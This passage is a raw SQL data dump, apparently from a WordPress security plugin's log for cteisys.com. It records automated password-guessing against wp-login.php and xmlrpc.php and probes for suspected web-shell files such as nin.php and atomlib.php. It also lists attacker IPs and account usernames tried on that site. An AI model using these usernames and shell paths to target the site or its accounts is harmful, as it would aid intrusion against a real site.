V5c','','19|0|0|0|cteisys.com/wp-admin/css/colors/blue/nin.php',0,19,0),('69.163.224.107',1168367723,'newd',0,1664216225.8678,7,'XtLFPa6SDe5A7h98sOWZzRlQ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('57.128.45.42',964701482,'',0,1664216220.0219,55,'HY3cgqdL1ZDBSyW2QGz9Jk5E','','19|0|0|0|cteisys.com/wp-admin/css/colors/blue/nin.php',0,19,0),('185.126.219.43',3112098603,'newd',0,1664215259.3620,7,'t3jsLvrkdCX7g1aiHRWoM5p4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.248.124.41',1761115177,'',0,1664227341.0681,55,'efT1sczJVdDlH3EWx2Q7pYmU','','19|0|0|0|cteisys.com/2index.php',0,19,0),('104.248.124.41',1761115177,'',0,1664227340.2377,55,'InCQasXxp8o1q9LYtJiO6uye','','19|0|0|0|cteisys.com/votes.php',0,19,0),('162.144.87.29',2727368477,'newd',0,1664225778.8118,7,'SKxRn8dVuHc2LmAC1Be9XpvZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.155.35',2415172387,'newd',0,1664221960.4039,7,'jOwy9buNBD8MAGTI01Z6tKJo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.191.40.94',1438591070,'newd',0,1664221012.2568,7,'wJWKGbhqrDHRAkSFX86LYu9y','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.245.110.251',2650107643,'newd',0,1664220076.1574,7,'eoRYGxykiQU5q2zCFnIDuSbZ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.240.28.177',2733644977,'newd',0,1664224822.2571,7,'IAv7VK2uMY6tUolfDeOG9h04','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('47.110.72.238',795756782,'newd',0,1664223864.5418,7,'5oQZp1VJai4d9IqgUvLfNhEb','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.196.200',1168360648,'newd',0,1664222907.2393,7,'PTVsRWxi8Gkvt5u3OhIJM2bB','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.248.124.41',1761115177,'',0,1664227339.4502,55,'WsSXgQvw5OLMDR6pt83AjqlV','','19|0|0|0|cteisys.com/css/load.php',0,19,0),('104.248.124.41',1761115177,'',0,1664227338.5780,55,'n0eu6REU81zSZfhqPL4mo7iN','','19|0|0|0|cteisys.com/contents.php',0,19,0),('103.130.218.189',1736628925,'newd',0,1664231524.1117,7,'nMwU4Z7iA1aRoHvBDqPIWKuG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.32.228.70',773907526,'newd',0,1664230572.5718,7,'5DP9LCRtbkdJ1yGEpIXlKOBq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.212.57',1736627257,'admin',0,1664235221.9423,152,'q5cL0ECZIl1BzKDwgAWUtT92','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.203.239',2160577519,'admin',0,1664235213.2118,152,'MTpQRJWj6K1axCV8ycGqPZ3A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.154.250.8',3483040264,'newd',0,1664234443.8205,7,'10FlD36vQatoJczyH4hSuIix','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.38.192.91',858177627,'newd',0,1664233484.8585,7,'YlPbBGWpdn7FyM5I6ZJe9SQR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.205.115',2160577907,'newd',0,1664237123.5280,152,'Nm8Ys2blCL0GjoyRAWwUfDzS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('192.64.113.147',3225448851,'newd',0,1664237120.2310,152,'pQoW2ucqgJHPy8FTAwXexO1I','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.39.235',3496814571,'newd',0,1664241172.5061,152,'jahqrfClJM3z7tRwN5KxTE6O','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.14.141.22',1779338518,'newd',0,1664241128.7367,152,'SVsrInDHM2ALFKyzpXlvPxW9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.163.132.194',3265496258,'newd',0,1664240496.3729,152,'blyNBv1O7hpEwk03geJZiQXa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.92.159.48',3193741104,'newd',0,1664240466.5700,152,'W58oLs3Oux1KqSnYC9dQaIFl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.57.186.73',792312393,'newd',0,1664245293.1844,152,'UBuf29aNxHCk10ElId8mQ57s','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('190.169.30.9',3198754313,'newd',0,1664244627.3964,152,'bEginyxDGNfSvTO2VcarA4L1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1664245292.2009,7,'FYGPv13pqKws9VRujxyUM7tJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.254.90.195',1761499843,'joyce',0,1664244433.1806,152,'jhcNUVGdlx352XIE8AM0fw64','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.114.72.18',796018706,'newd',0,1664248280.5006,7,'DOtbAYj6qKCzWa0Ec127udh8','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('120.79.8.125',2018445437,'newd',0,1664247659.1203,152,'tfEG3LjQMoz8NlBOehwWsFaR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('34.64.218.102',574675558,'newd',0,1664247626.6077,152,'4kLlumPiC23VBHTDhaZ5wQxf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('106.14.141.22',1779338518,'admin',0,1664251615.6894,152,'hmBDwUaLnXjMv5WH7PlecbFq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.89.2.220',2673410780,'admin',0,1664251615.5879,152,'habvm70eXxRICQtU3D26EysN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.111.116.44',795833388,'newd',0,1664251263.4075,7,'LxGI0QkNF5u6mZsXyASdWEtl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('45.252.250.41',771553833,'admin',0,1664255868.4594,152,'LWBS5IqdvVzYAr0sEymaePCN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.60.194',2160540866,'admin',0,1664255494.0969,152,'WAeUoRQHFlcta69JXEyvOpST','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1664255172.4531,7,'v1k7NWLJfdSz8soZYipIODKA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.73.237',2335918573,'admin',0,1664255171.0385,152,'M2uLBkopsUD6OvZnC7yibaFg','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('155.133.142.66',2609221186,'admin',0,1664255150.9488,152,'Oqsj284tDmBhw03kbcXSFuUn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'admin',0,1664259234.7807,51,'2GOcU1ESNV80Wy4anvjdAm6e','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.161.40',3583549736,'joyce',0,1664258819.0398,152,'DKz0GBWC3YqXMkJ2gHxPAN56','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.62.108.24',2990435352,'newd',0,1664262816.4226,7,'d6ln4E7G1sW2qo3OgbVckaP0','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.91.151.60',861640508,'newd',0,1664262815.5794,7,'PkNvcj9CzbJGdXmpefRWHlUO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.136.93.169',3582483881,'newd',0,1664262201.5344,7,'rJBT7mft8w3GIRD4vXHA5ZQ1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('162.14.71.142',2718844814,'newd',0,1664262191.8787,7,'69NPX2QBjfYWJsa843zHMFEn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('43.225.53.24',736179480,'newd',0,1664266169.5103,7,'GusIe3FlWw7Rg89mrqo64kja','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.136.54.132',3330815620,'newd',0,1664266153.9215,7,'bRA13h8agvslptKEjOqCoQWi','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.249.163.48',1543086896,'newd',0,1664265720.7546,7,'w6lIFA0ngd8JzPeajyOY52N9','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.153.214.231',1738135271,'newd',0,1664269600.3759,7,'0SGyTzAWkwQCFgELBXrZKjMI','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('184.168.121.5',3098048773,'newd',0,1664269582.5142,7,'fEvUGrkjC6PZ3WJyK5h07IQV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('104.248.80.191',1761104063,'newd',0,1664273783.5017,7,'fVnh6UiuNXC4M3D0P9KbOgF5','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('180.211.99.217',3033752537,'newd',0,1664273758.0169,7,'FXgpkncQ3yK5lbauzR8TC2mP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.195.254.123',3351510651,'Joyce',0,1664273456.1891,51,'QSLEzKHD43AmlsdjWo9TJZfY','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.65.219.142',2671893390,'newd',0,1664273042.3204,7,'a72Bmr8YCcPZMdQRst01jXxN','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.82.122',2335920762,'admin',0,1664276692.1211,51,'HWSiV2LgQNuyfZYDd9IEol5e','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.210.251.22',869464854,'newd',0,1664276543.4383,7,'pAPUa2mwuj8SI1t0gkJlGdYD','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('51.15.160.148',856662164,'newd',0,1664276518.7282,7,'8Axh4UTLly1H3DRmO2XYZw7n','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.103.30',3165021982,'newd',0,1664280261.1506,152,'F71D06drzHYTqvGBLcf5Jgp9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('213.149.103.132',3583338372,'newd',0,1664280062.8426,7,'FYjWmyLTJaegUcvIrOiXfwCP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('101.99.90.175',1701010095,'newd',0,1664280049.0350,7,'LmPZ3D1I6xdl7uTonV5a4rHy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('109.234.161.93',1844093277,'admin',0,1664285484.9312,152,'eImhaQ9ut5sR1gFfdBiXJUnT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.54.10',2388473354,'newd',0,1664284561.0687,7,'YNwlcoQ01aqFGLeAx6ZyRp3i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.207.163',2487799715,'admin',0,1664305200.4862,51,'dRSODxlgfs25LPNnFH89pVW4','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664308927.2380,152,'8DB0rN17eQnUuXvbECqKWVSl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.113.101',2953408869,'newd',0,1664318535.0393,152,'t6qpXE20QhmUwLJb8jBzaxeW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('20.101.71.221',342181853,'newd',0,1664317619.4013,7,'DzwUf0P8uYlIR6VHcZLCidBW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.120.246',2680912118,'newd',0,1664316506.0046,7,'pi2ql9JFm6IREubTxcoaXs8K','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('139.59.118.238',2335930094,'newd',0,1664316493.4258,7,'Yg7rbBM0cxv2Zz9GIFwUa6Ek','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1664329029.4679,7,'6Pmw9cfqszWeFyLUaEDQxknG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('212.103.4.29',3563521053,'newd',0,1664329005.8296,7,'QtqSNvj4sKzUaIcnMCAEgYiH','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.224.107',1168367723,'newd',0,1664327884.6005,7,'g6nAvuK0c2qPap3bJtxSsfF1','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('13.81.59.92',223427420,'newd',0,1664327864.6995,7,'v76carUWs3w8GM0LnXJu2zdS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664330959.9833,152,'FVZju4aNbs82DKLJYxkrSeoU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.8.12.105',1728580713,'newd',0,1664330954.9989,152,'IPCsLj1fOn60lgDX9xJTH7mu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.112.7',3110825991,'newd',0,1664330949.4988,152,'rDQLOTvotZue405SpACj3yEw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('137.63.71.51',2302625587,'joyce',0,1664334023.9531,152,'B1CiEXGzFb5SZV6LUo9Icepq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1664339534.3823,7,'ZcS4K5MyXUIGdTtHVbzPqoAl','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('165.232.180.174',2783491246,'newd',0,1664338359.1786,7,'dSM8mZRtv7usD65KYXH02G1e','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('69.163.186.158',1168358046,'newd',0,1664338354.6217,7,'yUWqNvkracdt9OJxIPSBnH6o','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('67.205.39.9',1137518345,'newd',0,1664342083.3089,7,'0KE1oGJ5mbYkTDh46UrIgSuF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.194',2487801538,'newd',0,1664342075.6889,7,'dmFQ3KJ0nkxz4VpoNXfejlHv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.12',3355043340,'joyce',0,1664341438.2237,152,'mwB8akR53NCIhGJqH1M6cTZy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('135.181.142.230',2276822758,'newd',0,1664345800.8872,152,'5Trbf20t3mBLMC78uxVXvSdW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('120.27.133.69',2015069509,'newd',0,1664345645.5309,7,'39npAkQVz265uoYgwvyjRfcS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.183.216.163',783800483,'joyce',0,1664391560.6685,152,'EkmPOdG5ShyZnTUqiRNjJB4M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.156.174.27',3114053147,'joyce',0,1664391214.8078,152,'elgS3B47wREvKzOmhdtW2rjM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.30',1434488606,'newd',0,1664390388.2266,152,'KzApRkvyuniTaeCNH7UYQgm6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('85.128.143.33',1434488609,'newd',0,1664390382.9454,152,'02XwtTIVqRKHGo5JiWheEmvZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.37.174.38',1747299878,'newd',0,1664390376.1800,152,'dePlQ7JrAb0jMGgHS43xEBwN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664390371.3985,152,'IVzRcAX2LO3tox5QrhqKlp1f','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664390371.1916,152,'I1dhN2tnkH85zL6axWrmKYps','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664390367.8962,152,'FC95nigbLGws6qok7Bp4J0WT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664390359.5007,152,'RId3qBeQXtD4wkLJNhVGZ65c','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('62.234.92.73',1055546441,'newd',0,1664390359.3627,152,'xFHqkt3eh7VpSGTWIMd5ugJR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('133.18.25.1',2232555777,'newd',0,1664390359.3623,152,'ivI8wRrbFflaCK6GtBD5WnS1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664389478.9747,51,'6b1oQ4nguI5mpks0ROEhNPGd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664389329.4989,152,'c7YCvQoLReg3DOFGHWJyP1aw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664389325.6087,152,'PxV39Lj7IpcZevqMbhSzn4gs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.240.60.255',2733653247,'newd',0,1664389315.5614,152,'5Hzs0dh9WKkUtT7Pwu8FEpbV','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664389310.9344,152,'K8ihOqRrlLXb6tVoJEk1zmwZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.252.248.52',771553332,'newd',0,1664389296.7627,152,'92rm4PeqOfxN0oYb3XVEu7Mn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664389296.7337,152,'voutbLC2aF8jHIYRhxNpeWJn','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664387184.8876,152,'wKPoJXmWN3HtQ7ra6sf091AS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('36.92.166.178',610051762,'newd',0,1664387166.6720,152,'3G7FNYZSXmDuMzdstIWPKR50','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.27.63.56',1729838904,'newd',0,1664387161.5113,152,'NYSE4javnWtD1iqzCFf86scm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664387157.5775,152,'xLdJM9vb3HSqrzOofVNRFAXP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.71.184.141',2806495373,'newd',0,1664387150.3063,152,'0hwqgyOGlH76AaxJiTZoVj1N','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664387148.0201,152,'HeoIybQ9aBDuF082YUsfqndx','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.88.53.33',1364735265,'newd',0,1664387140.6191,152,'kjyfD8u2JHx34sheg6MrU9Zb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('124.222.194.56',2094973496,'newd',0,1664387140.2814,152,'fwuBzTVZxWStGeyF3PjlK7Y4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.102.185',2994759353,'newd',0,1664387140.2574,152,'pYLKbSylQPUFG4jrqZu5okXa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664383785.3088,152,'7t1QF5fWD4zZkBIKvPGOx3HJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664383778.1245,152,'iRup5WK18HwfnvGMOjIl2FbE','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.86.198',1386567366,'newd',0,1664383769.3922,152,'B8Odt6MG1PxfU3aKbERqsyJC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.0.220.27',2717965339,'newd',0,1664383769.2045,152,'TGDvszC93pP87qEhKftXAjQZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.210.84.161',3000128673,'newd',0,1664383760.2417,152,'LtcABoJbnURdZw3x2qug5YDO','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.195.166',2160575398,'newd',0,1664383754.1817,152,'JDH8gL34lnscr5dzR7K9whqb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664383754.1284,152,'0rbXJD8Vc1zQ6e7H3vtqEoBw','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.127.106.229',2155834085,'newd',0,1664382684.0071,152,'oWFMLjdxmDU6X3SquAesRPO0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.140.64.25',311181337,'newd',0,1664382684.0038,152,'yQomgRJvcEFrNeAq5ufwUp14','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('223.165.66.70',3752149574,'newd',0,1664382684.0018,152,'0JbIiXKPpd4eFrEGhOVxcUQ6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.48.70',2388471878,'newd',0,1664382657.7794,152,'3aGT2E74cujDhReMoUH81LbW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('68.183.26.89',1152850521,'newd',0,1664382651.4305,152,'SlG0PtZqKIaufk5EB16UhCRJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('82.165.87.109',1386567533,'newd',0,1664382650.9483,152,'8gXVRAFp4OSemf6Q3iNh5KHT','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.238.150.43',1508808235,'joyce',0,1664382489.8088,152,'kBq9L2PGe3RgSiUQZbVucdyz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('134.19.179.203',2249438155,'joyce',0,1664381273.5731,152,'1OIjLHF02BQDE5cVbA7PmvqY','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('176.9.74.94',2953398878,'',0,1664380893.2212,55,'0qTfFOYdj5X7bGt1ea9r6yhn','','19|0|0|0|cteisys.com/wp-admin/css/atomlib.php',0,19,0),('176.9.74.94',2953398878,'',0,1664380889.6818,10,'3HAQi9remaP2UlpKGCY6XByn','','707|0|0|0|cteisys.com/wp-admin/css/atomlib.php',0,707,0),('176.9.74.94',2953398878,'',0,1664380889.6778,55,'3HAQi9remaP2UlpKGCY6XByn','','19|0|0|0|cteisys.com/wp-admin/css/atomlib.php',0,19,0),('176.9.74.94',2953398878,'',0,1664380886.2949,55,'RBZt0WuOwKCgiS8AvzMhDEkY','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('176.9.74.94',2953398878,'',0,1664380882.5702,55,'vbujD3mPXVUAr4WQ0owsIlnL','','19|0|0|0|cteisys.com/wp-commentin.php',0,19,0),('176.9.74.94',2953398878,'',0,1664380878.7673,55,'1foVsYz4DLcHngSr2IapMOhQ','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('176.9.74.94',2953398878,'',0,1664380875.6240,55,'VlD8RjBy7xb3sc5L6GEPOSoh','','19|0|0|0|cteisys.com/wp-includes/wp-class.php',0,19,0),('149.56.26.54',2503481910,'newd',0,1664380862.9980,7,'jYd38eNO4oK5hRtMCl0aIn6z','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.5.31',3103917343,'newd',0,1664380840.0904,7,'cwFkKGNJ2WOvqdYR6auBEeQT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('193.141.65.121',3247260025,'newd',0,1664380547.5989,152,'dnKaAgDwEqZLOc6uFkIzeQMR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.89.228.130',861529218,'newd',0,1664380544.4322,152,'Axy5r8icgHnemI0PdwabfvqK','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.12',3103917580,'newd',0,1664380537.1017,152,'qPVNowOpeLlCEdrtA18S2Q6g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('45.252.248.52',771553332,'newd',0,1664380529.5438,152,'YRz4x19agE36slAmPpnXOIoc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('97.74.82.165',1632260773,'newd',0,1664380523.9485,152,'hcTeFLE3vAuRPirmONdg7Jfk','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('50.62.177.214',842969558,'newd',0,1664380501.9734,152,'JcZlUqxLzYnasfF7ITEQv6ij','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('3.111.174.159',57650847,'newd',0,1664380499.9864,152,'bmwUxHutJpY1ds3OB9D8FEr0','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.68.254',3496822014,'newd',0,1664380495.7599,152,'TdGizqOKMRfrHAuXeo1Fv36Y','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1664379704.5169,7,'0a4cEX3iozFwRlBqsfQI8jYd','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.90.29',2319735325,'newd',0,1664379697.2107,7,'sf8hmieO2WvVHyKb5MN3ILPJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.130.218.189',1736628925,'newd',0,1664378526.1526,7,'GQhiB7HrTSDZXoe1Kpx9ygNn','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.162.84',3583550036,'joyce',0,1664378129.0039,152,'krgd5pGVhEaOo9CRDumiKHNB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('205.185.121.252',3451484668,'Joyce',0,1664378070.7524,51,'zCOjB7J9hfVtmHvqA6XedpsP','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.166.183.39',3165042471,'newd',0,1664377393.4306,7,'meHof40SbnT1jFyxVutczLZG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.154.177.165',1738191269,'admin',0,1664409960.3003,152,'spZ2N6AMwe0yOC8iEkRf139m','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('18.206.253.21',315555093,'admin',0,1664409786.0436,152,'SpH5aohZRQzrc0K6sWImEx2A','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('121.40.238.50',2032725554,'newd',0,1664420542.2568,152,'dsqPIxkn53bAyZ7XYEhuli4R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.166.163.52',3165037364,'newd',0,1664424085.8275,152,'oV7GkyqLF0UaYBruPXvdpjfc','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('151.80.20.26',2538607642,'newd',0,1664428045.5277,152,'7FcVkQ6gNZIAPDqRLKrmpM5G','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.255.64.58',872366138,'newd',0,1664427830.8372,152,'IO1LD8XsNHYMJdFgBthqr9bC','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('131.153.50.250',2207855354,'newd',0,1664464664.5074,152,'DVOZoiXj5l3WytMTGYfv7rP4','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.47.94',3515690846,'nathaniel-lipka',0,1664490683.6936,51,'Xf27YndZ6rLFc8a3H5quJBhG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('199.249.230.12',3355043340,'joyce',0,1664490559.5414,152,'Sy5prhkgKFCRcdLniJe8ExIN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.244.77.192',1760841152,'newd',0,1664497171.4059,7,'Fx08wnovGCbpQcS1O3dlkUrs','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('213.152.186.173',3583556269,'joyce',0,1664499689.3083,152,'JAT2KrXPB6UqZ5OlFSnsoCiH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.47.94',3515690846,'newd',0,1664504333.0926,7,'Uk5SfTM3ejWIGlDA1qdv4Eaw','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('216.250.116.85',3640292437,'newd',0,1664536539.9960,152,'VURabZ05KAeXFLynstJIWilo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.101.157.25',90545433,'newd',0,1664557520.6097,152,'nNRd5HV03ifzUag8BqPXl1Jv','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('177.52.160.29',2973016093,'newd',0,1664557306.4781,152,'4O16rTAX3YtoGcNvPxkmShLR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('154.0.165.146',2583733650,'newd',0,1664576905.4814,152,'bKnuoS47XJg9phQIfkzMdFyl','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('116.255.178.218',1962914522,'newd',0,1664576707.6509,152,'NHUtvbe12cYO03dzkfhL9FSD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('88.135.37.49',1485251889,'newd',0,1664576216.7147,152,'GjJeCbK1MwctmlHufgzxv60R','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.92.6',2731957254,'newd',0,1664575941.0591,152,'YjPWyCoMsJgB1nfSv6eh9E7L','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('188.132.174.112',3162812016,'newd',0,1664575707.5746,152,'v6tTwny7eQJXVaKpSGAmD4M9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.36.190',3515688126,'newd',0,1664579835.6758,7,'2wVs6Xz5nTeFUkM3axRL1Hp7','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.152.164.103',1738056807,'newd',0,1664579654.6574,152,'Eb4Bf5agOq76ApwLCxsWFQJo','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('31.184.242.14',532214286,'newd',0,1664579166.5980,152,'SZwoLYkXOVfe2Uq17iEQyNh6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('167.99.78.164',2808303268,'newd',0,1664578870.0421,152,'2VKeNLCH8WwnU0FjqG6bJZta','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.90.232.106',1734010986,'newd',0,1664584065.9138,152,'5ZmcNBH7Rab0ThsjiGlV2y4E','','0|0|0|0|cteisys.